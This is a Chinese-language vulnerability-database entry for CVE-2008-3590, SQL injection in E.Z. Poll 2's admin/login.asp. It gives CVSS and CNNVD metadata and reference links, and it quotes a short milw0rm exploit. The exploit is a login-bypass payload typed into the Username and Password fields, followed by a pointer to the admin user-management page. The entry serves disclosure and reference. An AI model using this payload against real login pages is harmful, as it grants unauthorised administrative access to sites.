E.Z.Poll admin/login.asp 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116901 漏洞类型 SQL注入
发布时间 2008-12-01 更新时间 2008-12-01
CVE编号 CVE-2008-3590 CNNVD-ID CNNVD-200808-139
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7315
https://www.securityfocus.com/bid/80981
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200808-139
|漏洞详情
E.Z.Poll是一套Web投票工具。E.Z.Poll2版本中的admin/login.asp存在多个SQL注入漏洞。远程攻击者可以利用Username和Password参数,执行任意的SQL指令。
|漏洞EXP
Description:
************* ***************** ************* *******************
E.Z. Poll <= v.2 script Remote SQL injection Exploit
discovered by t0fx aka xtof69
vendor : E.Z.


************* ***************** ************* *******************

vulnerable page : http://www.site.com/admin/login.asp

exploit :

Username : 'or' '='
Password : 'or' '='

Add, modify user :
/admin/admin-users.asp 

# milw0rm.com [2008-12-01]
|受影响的产品
Egi Zaberl E.Z. Poll 2
|参考资料

来源:SECUNIA
名称:31368
链接:http://secunia.com/advisories/31368